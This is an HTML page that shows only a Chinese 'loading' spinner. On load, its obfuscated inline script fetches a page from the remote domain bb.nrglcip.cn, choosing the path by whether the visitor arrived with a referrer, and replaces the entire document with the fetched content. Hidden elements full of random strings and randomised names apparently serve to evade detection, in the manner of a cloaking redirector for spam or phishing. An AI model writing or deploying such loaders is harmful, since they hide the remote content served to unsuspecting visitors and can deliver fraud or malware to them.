<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BdNkssQRA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BdNkssQRA .AgFRxEO8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BdNkssQRA .content {
            line-height: 50px;
            text-align: center
        }

        .BdNkssQRA .img {
            width: 100%
        }

        .BdNkssQRA .TIcwIxw6s {
            text-align: center
        }

        .BdNkssQRA .TIcwIxw6s span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BdNkssQRA .TIcwIxw6s span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BdNkssQRA .TIcwIxw6s span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BdNkssQRA .TIcwIxw6s span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BdNkssQRA .TIcwIxw6s span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BdNkssQRA .TIcwIxw6s span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BdNkssQRA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function H1NguR2Zr6RUH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dg2mEW = H1NguR2Zr6RUH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dg2mEW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dg2mEW +".html?a=share";
		}
		
        x7jz0ze=url+"#"+new Date().getTime();
        x7jz0ze && function() {
            $.get(x7jz0ze, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>RSGEDFookyETwUWCrFW9YBDFAfPlKD5Ytmbi9AMNdsdDg</a>
<div style='display:none'>aTJTnJWm2NHByWwqbBD</div>
<li style='display:none' >oZp2ibOOCTEiFrlhOj1UPRRxZzyhf1mkSkZEBPr5</li>
<img  src='' style='display:none'>
<span style='display:none'>r9gbVgfQlcPvbCInoFnyiO9FF0RPKLp4FfD0HMaR2TLFvQFVNcYpK4cPDpooN2VHxPOPZ5xVc3uWyiRG3LS8ut85Htt</span>
<h1 style='display:none' >AvneEifnRsa4k9g</h1>
<b style='display:none' >gwlSyFJ8Cjhv4pvES3IdFFE3ZuAvSwIMV</b>
<h1 style='display:none' >AvneEifnRsa4k9g</h1>
<img  src='' style='display:none'><div class="BdNkssQRA">
    <div class="AgFRxEO8">
        <div class="TIcwIxw6s">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>Cf4SrfNvBgixsZ55NRm8CvqykYAFAHbvKfBYLy18iOoAnrLp5iuD2wSnJNfoFFGcIRse8S4QW4</div>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>bWHtDMcD4gryaKouB7QKA8</a>
<ul style='display:none' >OM2UKKFdXxPXKDINrOn1UJo1ZamwAJ4v7</ul>
<a  href='#' style='display:none'>bWHtDMcD4gryaKouB7QKA8</a>
<h1 style='display:none' >vdY23ifGX3Qk6mmBrqlidB33AIEa5nOchaFB8xKqFfeYVeQZJx3MAelTCDJoKI3moG1g8STmgp6GPIfwyQxyS</h1>
<p  style='display:none'>GGmEJW9Dl89WfT9vATQi</p></body>
</html>